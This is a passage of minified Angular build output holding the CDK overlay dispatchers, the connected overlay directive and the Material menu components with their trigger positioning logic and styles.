d=r[c]._keydownEvents;this._ngZone?this._ngZone.run(()=>d.next(n)):d.next(n);break}}}add(e){super.add(e),this._isAttached||(this._ngZone?this._ngZone.runOutsideAngular(()=>this._document.body.addEventListener("keydown",this._keydownListener)):this._document.body.addEventListener("keydown",this._keydownListener),this._isAttached=!0)}detach(){this._isAttached&&(this._document.body.removeEventListener("keydown",this._keydownListener),this._isAttached=!1)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),j_e=(()=>{class t extends iF{constructor(e,i,n){super(e),this._platform=i,this._ngZone=n,this._cursorStyleIsSet=!1,this._pointerDownListener=r=>{this._pointerDownEventTarget=wd(r)},this._clickListener=r=>{const c=wd(r),d="click"===r.type&&this._pointerDownEventTarget?this._pointerDownEventTarget:c;this._pointerDownEventTarget=null;const T=this._attachedOverlays.slice();for(let k=T.length-1;k>-1;k--){const q=T[k];if(q._outsidePointerEvents.observers.length<1||!q.hasAttached())continue;if(q.overlayElement.contains(c)||q.overlayElement.contains(d))break;const Y=q._outsidePointerEvents;this._ngZone?this._ngZone.run(()=>Y.next(r)):Y.next(r)}}}add(e){if(super.add(e),!this._isAttached){const i=this._document.body;this._ngZone?this._ngZone.runOutsideAngular(()=>this._addEventListeners(i)):this._addEventListeners(i),this._platform.IOS&&!this._cursorStyleIsSet&&(this._cursorOriginalValue=i.style.cursor,i.style.cursor="pointer",this._cursorStyleIsSet=!0),this._isAttached=!0}}detach(){if(this._isAttached){const e=this._document.body;e.removeEventListener("pointerdown",this._pointerDownListener,!0),e.removeEventListener("click",this._clickListener,!0),e.removeEventListener("auxclick",this._clickListener,!0),e.removeEventListener("contextmenu",this._clickListener,!0),this._platform.IOS&&this._cursorStyleIsSet&&(e.style.cursor=this._cursorOriginalValue,this._cursorStyleIsSet=!1),this._isAttached=!1}}_addEventListeners(e){e.addEventListener("pointerdown",this._pointerDownListener,!0),e.addEventListener("click",this._clickListener,!0),e.addEventListener("auxclick",this._clickListener,!0),e.addEventListener("contextmenu",this._clickListener,!0)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(sr),At(qi,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Q_e=0,vs=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.scrollStrategies=e,this._overlayContainer=i,this._componentFactoryResolver=n,this._positionBuilder=r,this._keyboardDispatcher=c,this._injector=d,this._ngZone=T,this._document=k,this._directionality=q,this._location=Y,this._outsideClickDispatcher=te,this._animationsModuleType=pe}create(e){const i=this._createHostElement(),n=this._createPaneElement(i),r=this._createPortalOutlet(n),c=new bg(e);return c.direction=c.direction||this._directionality.value,new nb(r,i,n,c,this._ngZone,this._keyboardDispatcher,this._document,this._location,this._outsideClickDispatcher,"NoopAnimations"===this._animationsModuleType)}position(){return this._positionBuilder}_createPaneElement(e){const i=this._document.createElement("div");return i.id="cdk-overlay-"+Q_e++,i.classList.add("cdk-overlay-pane"),e.appendChild(i),i}_createHostElement(){const e=this._document.createElement("div");return this._overlayContainer.getContainerElement().appendChild(e),e}_createPortalOutlet(e){return this._appRef||(this._appRef=this._injector.get(Jf)),new Zw(e,this._componentFactoryResolver,this._appRef,this._injector,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(F_e),At(ob),At(On),At(q_e),At(G_e),At(Ko),At(qi),At(ga),At(Cr),At(iy),At(j_e),At(ir,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const $_e=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom"},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],aF=new ni("cdk-connected-overlay-scroll-strategy");let t8=(()=>{class t{constructor(e){this.elementRef=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-overlay-origin",""],["","overlay-origin",""],["","cdkOverlayOrigin",""]],exportAs:["cdkOverlayOrigin"]}),t})(),i8=(()=>{class t{constructor(e,i,n,r,c){this._overlay=e,this._dir=c,this._hasBackdrop=!1,this._lockPosition=!1,this._growAfterOpen=!1,this._flexibleDimensions=!1,this._push=!1,this._backdropSubscription=I.EMPTY,this._attachSubscription=I.EMPTY,this._detachSubscription=I.EMPTY,this._positionSubscription=I.EMPTY,this.viewportMargin=0,this.open=!1,this.disableClose=!1,this.backdropClick=new Tt,this.positionChange=new Tt,this.attach=new Tt,this.detach=new Tt,this.overlayKeydown=new Tt,this.overlayOutsideClick=new Tt,this._templatePortal=new Mm(i,n),this._scrollStrategyFactory=r,this.scrollStrategy=this._scrollStrategyFactory()}get offsetX(){return this._offsetX}set offsetX(e){this._offsetX=e,this._position&&this._updatePositionStrategy(this._position)}get offsetY(){return this._offsetY}set offsetY(e){this._offsetY=e,this._position&&this._updatePositionStrategy(this._position)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}get lockPosition(){return this._lockPosition}set lockPosition(e){this._lockPosition=wi(e)}get flexibleDimensions(){return this._flexibleDimensions}set flexibleDimensions(e){this._flexibleDimensions=wi(e)}get growAfterOpen(){return this._growAfterOpen}set growAfterOpen(e){this._growAfterOpen=wi(e)}get push(){return this._push}set push(e){this._push=wi(e)}get overlayRef(){return this._overlayRef}get dir(){return this._dir?this._dir.value:"ltr"}ngOnDestroy(){this._attachSubscription.unsubscribe(),this._detachSubscription.unsubscribe(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this._overlayRef&&this._overlayRef.dispose()}ngOnChanges(e){this._position&&(this._updatePositionStrategy(this._position),this._overlayRef.updateSize({width:this.width,minWidth:this.minWidth,height:this.height,minHeight:this.minHeight}),e.origin&&this.open&&this._position.apply()),e.open&&(this.open?this._attachOverlay():this._detachOverlay())}_createOverlay(){(!this.positions||!this.positions.length)&&(this.positions=$_e);const e=this._overlayRef=this._overlay.create(this._buildConfig());this._attachSubscription=e.attachments().subscribe(()=>this.attach.emit()),this._detachSubscription=e.detachments().subscribe(()=>this.detach.emit()),e.keydownEvents().subscribe(i=>{this.overlayKeydown.next(i),27===i.keyCode&&!this.disableClose&&!Zr(i)&&(i.preventDefault(),this._detachOverlay())}),this._overlayRef.outsidePointerEvents().subscribe(i=>{this.overlayOutsideClick.next(i)})}_buildConfig(){const e=this._position=this.positionStrategy||this._createPositionStrategy(),i=new bg({direction:this._dir,positionStrategy:e,scrollStrategy:this.scrollStrategy,hasBackdrop:this.hasBackdrop});return(this.width||0===this.width)&&(i.width=this.width),(this.height||0===this.height)&&(i.height=this.height),(this.minWidth||0===this.minWidth)&&(i.minWidth=this.minWidth),(this.minHeight||0===this.minHeight)&&(i.minHeight=this.minHeight),this.backdropClass&&(i.backdropClass=this.backdropClass),this.panelClass&&(i.panelClass=this.panelClass),i}_updatePositionStrategy(e){const i=this.positions.map(n=>({originX:n.originX,originY:n.originY,overlayX:n.overlayX,overlayY:n.overlayY,offsetX:n.offsetX||this.offsetX,offsetY:n.offsetY||this.offsetY,panelClass:n.panelClass||void 0}));return e.setOrigin(this._getFlexibleConnectedPositionStrategyOrigin()).withPositions(i).withFlexibleDimensions(this.flexibleDimensions).withPush(this.push).withGrowAfterOpen(this.growAfterOpen).withViewportMargin(this.viewportMargin).withLockedPosition(this.lockPosition).withTransformOriginOn(this.transformOriginSelector)}_createPositionStrategy(){const e=this._overlay.position().flexibleConnectedTo(this._getFlexibleConnectedPositionStrategyOrigin());return this._updatePositionStrategy(e),e}_getFlexibleConnectedPositionStrategyOrigin(){return this.origin instanceof t8?this.origin.elementRef:this.origin}_attachOverlay(){this._overlayRef?this._overlayRef.getConfig().hasBackdrop=this.hasBackdrop:this._createOverlay(),this._overlayRef.hasAttached()||this._overlayRef.attach(this._templatePortal),this.hasBackdrop?this._backdropSubscription=this._overlayRef.backdropClick().subscribe(e=>{this.backdropClick.emit(e)}):this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe(),this.positionChange.observers.length>0&&(this._positionSubscription=this._position.positionChanges.pipe(eL(()=>this.positionChange.observers.length>0)).subscribe(e=>{this.positionChange.emit(e),0===this.positionChange.observers.length&&this._positionSubscription.unsubscribe()}))}_detachOverlay(){this._overlayRef&&this._overlayRef.detach(),this._backdropSubscription.unsubscribe(),this._positionSubscription.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(vs),Ee(ho),Ee(fo),Ee(aF),Ee(Cr,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdk-connected-overlay",""],["","connected-overlay",""],["","cdkConnectedOverlay",""]],inputs:{origin:["cdkConnectedOverlayOrigin","origin"],positions:["cdkConnectedOverlayPositions","positions"],positionStrategy:["cdkConnectedOverlayPositionStrategy","positionStrategy"],offsetX:["cdkConnectedOverlayOffsetX","offsetX"],offsetY:["cdkConnectedOverlayOffsetY","offsetY"],width:["cdkConnectedOverlayWidth","width"],height:["cdkConnectedOverlayHeight","height"],minWidth:["cdkConnectedOverlayMinWidth","minWidth"],minHeight:["cdkConnectedOverlayMinHeight","minHeight"],backdropClass:["cdkConnectedOverlayBackdropClass","backdropClass"],panelClass:["cdkConnectedOverlayPanelClass","panelClass"],viewportMargin:["cdkConnectedOverlayViewportMargin","viewportMargin"],scrollStrategy:["cdkConnectedOverlayScrollStrategy","scrollStrategy"],open:["cdkConnectedOverlayOpen","open"],disableClose:["cdkConnectedOverlayDisableClose","disableClose"],transformOriginSelector:["cdkConnectedOverlayTransformOriginOn","transformOriginSelector"],hasBackdrop:["cdkConnectedOverlayHasBackdrop","hasBackdrop"],lockPosition:["cdkConnectedOverlayLockPosition","lockPosition"],flexibleDimensions:["cdkConnectedOverlayFlexibleDimensions","flexibleDimensions"],growAfterOpen:["cdkConnectedOverlayGrowAfterOpen","growAfterOpen"],push:["cdkConnectedOverlayPush","push"]},outputs:{backdropClick:"backdropClick",positionChange:"positionChange",attach:"attach",detach:"detach",overlayKeydown:"overlayKeydown",overlayOutsideClick:"overlayOutsideClick"},exportAs:["cdkConnectedOverlay"],features:[sa]}),t})();const X_e={provide:aF,deps:[vs],useFactory:function K_e(t){return()=>t.scrollStrategies.reposition()}};let bu=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[vs,X_e],imports:[R1,yu,Hy,Hy]}),t})();const Y_e=["mat-menu-item",""];function J_e(t,a){1&t&&(fi(),m(0,"svg",2),it(1,"polygon",3),u())}const nF=["*"];function Z_e(t,a){if(1&t){const e=Ye();m(0,"div",0),he("keydown",function(n){return be(e),Me(B()._handleKeydown(n))})("click",function(){return be(e),Me(B().closed.emit("click"))})("@transformMenu.start",function(n){return be(e),Me(B()._onAnimationStart(n))})("@transformMenu.done",function(n){return be(e),Me(B()._onAnimationDone(n))}),m(1,"div",1),va(2),u()()}if(2&t){const e=B();V("id",e.panelId)("ngClass",e._classList)("@transformMenu",e._panelAnimationState),Rt("aria-label",e.ariaLabel||null)("aria-labelledby",e.ariaLabelledby||null)("aria-describedby",e.ariaDescribedby||null)}}const tA={transformMenu:ar("transformMenu",[sn("void",zi({opacity:0,transform:"scale(0.8)"})),gn("void => enter",En("120ms cubic-bezier(0, 0, 0.2, 1)",zi({opacity:1,transform:"scale(1)"}))),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))]),fadeInItems:ar("fadeInItems",[sn("showing",zi({opacity:1})),gn("void => *",[zi({opacity:0}),En("400ms 100ms cubic-bezier(0.55, 0, 0.55, 0.2)")])])},oF=new ni("MatMenuContent");let ege=(()=>{class t{constructor(e,i,n,r,c,d,T){this._template=e,this._componentFactoryResolver=i,this._appRef=n,this._injector=r,this._viewContainerRef=c,this._document=d,this._changeDetectorRef=T,this._attached=new J}attach(e={}){var i;this._portal||(this._portal=new Mm(this._template,this._viewContainerRef)),this.detach(),this._outlet||(this._outlet=new Zw(this._document.createElement("div"),this._componentFactoryResolver,this._appRef,this._injector));const n=this._template.elementRef.nativeElement;n.parentNode.insertBefore(this._outlet.outletElement,n),null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck(),this._portal.attach(this._outlet,e),this._attached.next()}detach(){this._portal.isAttached&&this._portal.detach()}ngOnDestroy(){this._outlet&&this._outlet.dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(On),Ee(Jf),Ee(Ko),Ee(fo),Ee(ga),Ee(Ma))},t.\u0275dir=Ot({type:t}),t})(),Zc=(()=>{class t extends ege{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["ng-template","matMenuContent",""]],features:[ki([{provide:oF,useExisting:t}]),ci]}),t})();const a8=new ni("MAT_MENU_PANEL"),tge=Dl(Jc(class{}));let qo=(()=>{class t extends tge{constructor(e,i,n,r,c){var d;super(),this._elementRef=e,this._document=i,this._focusMonitor=n,this._parentMenu=r,this._changeDetectorRef=c,this.role="menuitem",this._hovered=new J,this._focused=new J,this._highlighted=!1,this._triggersSubmenu=!1,null===(d=null==r?void 0:r.addItem)||void 0===d||d.call(r,this)}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._getHostElement(),e,i):this._getHostElement().focus(i),this._focused.next(this)}ngAfterViewInit(){this._focusMonitor&&this._focusMonitor.monitor(this._elementRef,!1)}ngOnDestroy(){this._focusMonitor&&this._focusMonitor.stopMonitoring(this._elementRef),this._parentMenu&&this._parentMenu.removeItem&&this._parentMenu.removeItem(this),this._hovered.complete(),this._focused.complete()}_getTabIndex(){return this.disabled?"-1":"0"}_getHostElement(){return this._elementRef.nativeElement}_checkDisabled(e){this.disabled&&(e.preventDefault(),e.stopPropagation())}_handleMouseEnter(){this._hovered.next(this)}getLabel(){var e;const i=this._elementRef.nativeElement.cloneNode(!0),n=i.querySelectorAll("mat-icon, .material-icons");for(let r=0;r<n.length;r++)n[r].remove();return(null===(e=i.textContent)||void 0===e?void 0:e.trim())||""}_setHighlighted(e){var i;this._highlighted=e,null===(i=this._changeDetectorRef)||void 0===i||i.markForCheck()}_hasFocus(){return this._document&&this._document.activeElement===this._getHostElement()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(ga),Ee(js),Ee(a8,8),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["","mat-menu-item",""]],hostAttrs:[1,"mat-focus-indicator"],hostVars:10,hostBindings:function(e,i){1&e&&he("click",function(r){return i._checkDisabled(r)})("mouseenter",function(){return i._handleMouseEnter()}),2&e&&(Rt("role",i.role)("tabindex",i._getTabIndex())("aria-disabled",i.disabled.toString())("disabled",i.disabled||null),Ct("mat-menu-item",!0)("mat-menu-item-highlighted",i._highlighted)("mat-menu-item-submenu-trigger",i._triggersSubmenu))},inputs:{disabled:"disabled",disableRipple:"disableRipple",role:"role"},exportAs:["matMenuItem"],features:[ci],attrs:Y_e,ngContentSelectors:nF,decls:3,vars:3,consts:[["matRipple","",1,"mat-menu-ripple",3,"matRippleDisabled","matRippleTrigger"],["class","mat-menu-submenu-icon","viewBox","0 0 5 10","focusable","false",4,"ngIf"],["viewBox","0 0 5 10","focusable","false",1,"mat-menu-submenu-icon"],["points","0,0 5,5 0,10"]],template:function(e,i){1&e&&(Jn(),va(0),it(1,"div",0),ne(2,J_e,2,0,"svg",1)),2&e&&(C(1),V("matRippleDisabled",i.disableRipple||i.disabled)("matRippleTrigger",i._getHostElement()),C(1),V("ngIf",i._triggersSubmenu))},dependencies:[Ri,xl],encapsulation:2,changeDetection:0}),t})();const rF=new ni("mat-menu-default-options",{providedIn:"root",factory:function ige(){return{overlapTrigger:!1,xPosition:"after",yPosition:"below",backdropClass:"cdk-overlay-transparent-backdrop"}}});let age=0,rb=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._defaultOptions=n,this._changeDetectorRef=r,this._xPosition=this._defaultOptions.xPosition,this._yPosition=this._defaultOptions.yPosition,this._directDescendantItems=new gd,this._tabSubscription=I.EMPTY,this._classList={},this._panelAnimationState="void",this._animationDone=new J,this.overlayPanelClass=this._defaultOptions.overlayPanelClass||"",this.backdropClass=this._defaultOptions.backdropClass,this._overlapTrigger=this._defaultOptions.overlapTrigger,this._hasBackdrop=this._defaultOptions.hasBackdrop,this.closed=new Tt,this.close=this.closed,this.panelId="mat-menu-panel-"+age++}get xPosition(){return this._xPosition}set xPosition(e){this._xPosition=e,this.setPositionClasses()}get yPosition(){return this._yPosition}set yPosition(e){this._yPosition=e,this.setPositionClasses()}get overlapTrigger(){return this._overlapTrigger}set overlapTrigger(e){this._overlapTrigger=wi(e)}get hasBackdrop(){return this._hasBackdrop}set hasBackdrop(e){this._hasBackdrop=wi(e)}set panelClass(e){const i=this._previousPanelClass;i&&i.length&&i.split(" ").forEach(n=>{this._classList[n]=!1}),this._previousPanelClass=e,e&&e.length&&(e.split(" ").forEach(n=>{this._classList[n]=!0}),this._elementRef.nativeElement.className="")}get classList(){return this.panelClass}set classList(e){this.panelClass=e}ngOnInit(){this.setPositionClasses()}ngAfterContentInit(){this._updateDirectDescendants(),this._keyManager=new L1(this._directDescendantItems).withWrap().withTypeAhead().withHomeAndEnd(),this._tabSubscription=this._keyManager.tabOut.subscribe(()=>this.closed.emit("tab")),this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(e=>ra(...e.map(i=>i._focused)))).subscribe(e=>this._keyManager.updateActiveItem(e)),this._directDescendantItems.changes.subscribe(e=>{var i;const n=this._keyManager;if("enter"===this._panelAnimationState&&(null===(i=n.activeItem)||void 0===i?void 0:i._hasFocus())){const r=e.toArray(),c=Math.max(0,Math.min(r.length-1,n.activeItemIndex||0));r[c]&&!r[c].disabled?n.setActiveItem(c):n.setNextItemActive()}})}ngOnDestroy(){this._directDescendantItems.destroy(),this._tabSubscription.unsubscribe(),this.closed.complete()}_hovered(){return this._directDescendantItems.changes.pipe(Ro(this._directDescendantItems),Ur(i=>ra(...i.map(n=>n._hovered))))}addItem(e){}removeItem(e){}_handleKeydown(e){const i=e.keyCode,n=this._keyManager;switch(i){case 27:Zr(e)||(e.preventDefault(),this.closed.emit("keydown"));break;case 37:this.parentMenu&&"ltr"===this.direction&&this.closed.emit("keydown");break;case 39:this.parentMenu&&"rtl"===this.direction&&this.closed.emit("keydown");break;default:return(38===i||40===i)&&n.setFocusOrigin("keyboard"),void n.onKeydown(e)}e.stopPropagation()}focusFirstItem(e="program"){this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{let i=null;if(this._directDescendantItems.length&&(i=this._directDescendantItems.first._getHostElement().closest('[role="menu"]')),!i||!i.contains(document.activeElement)){const n=this._keyManager;n.setFocusOrigin(e).setFirstItemActive(),!n.activeItem&&i&&i.focus()}})}resetActiveItem(){this._keyManager.setActiveItem(-1)}setElevation(e){const i=Math.min(this._baseElevation+e,24),n=`${this._elevationPrefix}${i}`,r=Object.keys(this._classList).find(c=>c.startsWith(this._elevationPrefix));(!r||r===this._previousElevation)&&(this._previousElevation&&(this._classList[this._previousElevation]=!1),this._classList[n]=!0,this._previousElevation=n)}setPositionClasses(e=this.xPosition,i=this.yPosition){var n;const r=this._classList;r["mat-menu-before"]="before"===e,r["mat-menu-after"]="after"===e,r["mat-menu-above"]="above"===i,r["mat-menu-below"]="below"===i,null===(n=this._changeDetectorRef)||void 0===n||n.markForCheck()}_startAnimation(){this._panelAnimationState="enter"}_resetAnimation(){this._panelAnimationState="void"}_onAnimationDone(e){this._animationDone.next(e),this._isAnimating=!1}_onAnimationStart(e){this._isAnimating=!0,"enter"===e.toState&&0===this._keyManager.activeItemIndex&&(e.element.scrollTop=0)}_updateDirectDescendants(){this._allItems.changes.pipe(Ro(this._allItems)).subscribe(e=>{this._directDescendantItems.reset(e.filter(i=>i._parentMenu===this)),this._directDescendantItems.notifyOnChanges()})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275dir=Ot({type:t,contentQueries:function(e,i,n){if(1&e&&(ha(n,oF,5),ha(n,qo,5),ha(n,qo,4)),2&e){let r;Vt(r=Bt())&&(i.lazyContent=r.first),Vt(r=Bt())&&(i._allItems=r),Vt(r=Bt())&&(i.items=r)}},viewQuery:function(e,i){if(1&e&&Mi(ho,5),2&e){let n;Vt(n=Bt())&&(i.templateRef=n.first)}},inputs:{backdropClass:"backdropClass",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],ariaDescribedby:["aria-describedby","ariaDescribedby"],xPosition:"xPosition",yPosition:"yPosition",overlapTrigger:"overlapTrigger",hasBackdrop:"hasBackdrop",panelClass:["class","panelClass"],classList:"classList"},outputs:{closed:"closed",close:"close"}}),t})(),Xo=(()=>{class t extends rb{constructor(e,i,n,r){super(e,i,n,r),this._elevationPrefix="mat-elevation-z",this._baseElevation=4}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(rF),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["mat-menu"]],hostVars:3,hostBindings:function(e,i){2&e&&Rt("aria-label",null)("aria-labelledby",null)("aria-describedby",null)},exportAs:["matMenu"],features:[ki([{provide:a8,useExisting:t}]),ci],ngContentSelectors:nF,decls:1,vars:0,consts:[["tabindex","-1","role","menu",1,"mat-menu-panel",3,"id","ngClass","keydown","click"],[1,"mat-menu-content"]],template:function(e,i){1&e&&(Jn(),ne(0,Z_e,3,6,"ng-template"))},dependencies:[ag],styles:['mat-menu{display:none}.mat-menu-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;max-height:calc(100vh - 48px);border-radius:4px;outline:0;min-height:64px;position:relative}.mat-menu-panel.ng-animating{pointer-events:none}.cdk-high-contrast-active .mat-menu-panel{outline:solid 1px}.mat-menu-content:not(:empty){padding-top:8px;padding-bottom:8px}.mat-menu-item{-webkit-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:rgba(0,0,0,0);white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;max-width:100%;position:relative}.mat-menu-item::-moz-focus-inner{border:0}.mat-menu-item[disabled]{cursor:default}[dir=rtl] .mat-menu-item{text-align:right}.mat-menu-item .mat-icon{margin-right:16px;vertical-align:middle}.mat-menu-item .mat-icon svg{vertical-align:top}[dir=rtl] .mat-menu-item .mat-icon{margin-left:16px;margin-right:0}.mat-menu-item[disabled]::after{display:block;position:absolute;content:"";top:0;left:0;bottom:0;right:0}.cdk-high-contrast-active .mat-menu-item{margin-top:1px}.mat-menu-item-submenu-trigger{padding-right:32px}[dir=rtl] .mat-menu-item-submenu-trigger{padding-right:16px;padding-left:32px}.mat-menu-submenu-icon{position:absolute;top:50%;right:16px;transform:translateY(-50%);width:5px;height:10px;fill:currentColor}[dir=rtl] .mat-menu-submenu-icon{right:auto;left:16px;transform:translateY(-50%) scaleX(-1)}.cdk-high-contrast-active .mat-menu-submenu-icon{fill:CanvasText}button.mat-menu-item{width:100%}.mat-menu-item .mat-menu-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}'],encapsulation:2,data:{animation:[tA.transformMenu,tA.fadeInItems]},changeDetection:0}),t})();const n8=new ni("mat-menu-scroll-strategy"),oge={provide:n8,deps:[vs],useFactory:function nge(t){return()=>t.scrollStrategies.reposition()}},sF=ym({passive:!0});let rge=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q){this._overlay=e,this._element=i,this._viewContainerRef=n,this._menuItemInstance=d,this._dir=T,this._focusMonitor=k,this._ngZone=q,this._overlayRef=null,this._menuOpen=!1,this._closingActionsSubscription=I.EMPTY,this._hoverSubscription=I.EMPTY,this._menuCloseSubscription=I.EMPTY,this._handleTouchStart=Y=>{F3(Y)||(this._openedBy="touch")},this._openedBy=void 0,this.restoreFocus=!0,this.menuOpened=new Tt,this.onMenuOpen=this.menuOpened,this.menuClosed=new Tt,this.onMenuClose=this.menuClosed,this._scrollStrategy=r,this._parentMaterialMenu=c instanceof rb?c:void 0,i.nativeElement.addEventListener("touchstart",this._handleTouchStart,sF),d&&(d._triggersSubmenu=this.triggersSubmenu())}get _deprecatedMatMenuTriggerFor(){return this.menu}set _deprecatedMatMenuTriggerFor(e){this.menu=e}get menu(){return this._menu}set menu(e){e!==this._menu&&(this._menu=e,this._menuCloseSubscription.unsubscribe(),e&&(this._menuCloseSubscription=e.close.subscribe(i=>{this._destroyMenu(i),("click"===i||"tab"===i)&&this._parentMaterialMenu&&this._parentMaterialMenu.closed.emit(i)})))}ngAfterContentInit(){this._handleHover()}ngOnDestroy(){this._overlayRef&&(this._overlayRef.dispose(),this._overlayRef=null),this._element.nativeElement.removeEventListener("touchstart",this._handleTouchStart,sF),this._menuCloseSubscription.unsubscribe(),this._closingActionsSubscription.unsubscribe(),this._hoverSubscription.unsubscribe()}get menuOpen(){return this._menuOpen}get dir(){return this._dir&&"rtl"===this._dir.value?"rtl":"ltr"}triggersSubmenu(){return!(!this._menuItemInstance||!this._parentMaterialMenu)}toggleMenu(){return this._menuOpen?this.closeMenu():this.openMenu()}openMenu(){const e=this.menu;if(this._menuOpen||!e)return;const i=this._createOverlay(e),n=i.getConfig(),r=n.positionStrategy;this._setPosition(e,r),n.hasBackdrop=null==e.hasBackdrop?!this.triggersSubmenu():e.hasBackdrop,i.attach(this._getPortal(e)),e.lazyContent&&e.lazyContent.attach(this.menuData),this._closingActionsSubscription=this._menuClosingActions().subscribe(()=>this.closeMenu()),this._initMenu(e),e instanceof rb&&(e._startAnimation(),e._directDescendantItems.changes.pipe(ea(e.close)).subscribe(()=>{r.withLockedPosition(!1).reapplyLastPosition(),r.withLockedPosition(!0)}))}closeMenu(){var e;null===(e=this.menu)||void 0===e||e.close.emit()}focus(e,i){this._focusMonitor&&e?this._focusMonitor.focusVia(this._element,e,i):this._element.nativeElement.focus(i)}updatePosition(){var e;null===(e=this._overlayRef)||void 0===e||e.updatePosition()}_destroyMenu(e){var i;if(!this._overlayRef||!this.menuOpen)return;const n=this.menu;this._closingActionsSubscription.unsubscribe(),this._overlayRef.detach(),this.restoreFocus&&("keydown"===e||!this._openedBy||!this.triggersSubmenu())&&this.focus(this._openedBy),this._openedBy=void 0,n instanceof rb?(n._resetAnimation(),n.lazyContent?n._animationDone.pipe(Dn(r=>"void"===r.toState),Cn(1),ea(n.lazyContent._attached)).subscribe({next:()=>n.lazyContent.detach(),complete:()=>this._setIsMenuOpen(!1)}):this._setIsMenuOpen(!1)):(this._setIsMenuOpen(!1),null===(i=null==n?void 0:n.lazyContent)||void 0===i||i.detach())}_initMenu(e){e.parentMenu=this.triggersSubmenu()?this._parentMaterialMenu:void 0,e.direction=this.dir,this._setMenuElevation(e),e.focusFirstItem(this._openedBy||"program"),this._setIsMenuOpen(!0)}_setMenuElevation(e){if(e.setElevation){let i=0,n=e.parentMenu;for(;n;)i++,n=n.parentMenu;e.setElevation(i)}}_setIsMenuOpen(e){this._menuOpen=e,this._menuOpen?this.menuOpened.emit():this.menuClosed.emit(),this.triggersSubmenu()&&this._menuItemInstance._setHighlighted(e)}_createOverlay(e){if(!this._overlayRef){const i=this._getOverlayConfig(e);this._subscribeToPositions(e,i.positionStrategy),this._overlayRef=this._overlay.create(i),this._overlayRef.keydownEvents().subscribe()}return this._overlayRef}_getOverlayConfig(e){return new bg({positionStrategy:this._overlay.position().flexibleConnectedTo(this._element).withLockedPosition().withGrowAfterOpen().withTransformOriginOn(".mat-menu-panel, .mat-mdc-menu-panel"),backdropClass:e.backdropClass||"cdk-overlay-transparent-backdrop",panelClass:e.overlayPanelClass,scrollStrategy:this._scrollStrategy(),direction:this._dir})}_subscribeToPositions(e,i){e.setPositionClasses&&i.positionChanges.subscribe(n=>{const r="start"===n.connectionPair.overlayX?"after":"before",c="top"===n.connectionPair.overlayY?"below":"above";this._ngZone?this._ngZone.run(()=>e.setPositionClasses(r,c)):e.setPositionClasses(r,c)})}_setPosition(e,i){let[n,r]="before"===e.xPosition?["end","start"]:["start","end"],[c,d]="above"===e.yPosition?["bottom","top"]:["top","bottom"],[T,k]=[c,d],[q,Y]=[n,r],te=0;if(this.triggersSubmenu()){if(Y=n="before"===e.xPosition?"start":"end",r=q="end"===n?"start":"end",this._parentMaterialMenu){if(null==this._parentInnerPadding){const pe=this._parentMaterialMenu.items.first;this._parentInnerPadding=pe?pe._getHostElement().offsetTop:0}te="bottom"===c?this._parentInnerPadding:-this._parentInnerPadding}}else e.overlapTrigger||(T="top"===c?"bottom":"top",k="top"===d?"bottom":"top");i.withPositions([{originX:n,originY:T,overlayX:q,overlayY:c,offsetY:te},{originX:r,originY:T,overlayX:Y,overlayY:c,offsetY:te},{originX:n,originY:k,overlayX:q,overlayY:d,offsetY:-te},{originX:r,originY:k,overlayX:Y,overlayY:d,offsetY:-te}])}_menuClosingActions(){const e=this._overlayRef.backdropClick(),i=this._overlayRef.detachments();return ra(e,this._parentMaterialMenu?this._parentMaterialMenu.closed:Bi(),this._parentMaterialMenu?this._parentMaterialMenu._hovered().pipe(Dn(c=>c!==this._menuItemInstance),Dn(()=>this._menuOpen)):Bi(),i)}_handleMousedown(e){W3(e)||(this._openedBy=0===e.button?"mouse":void 0,this.triggersSubmenu()&&e.preventDefault())}_handleKeydown(e){const 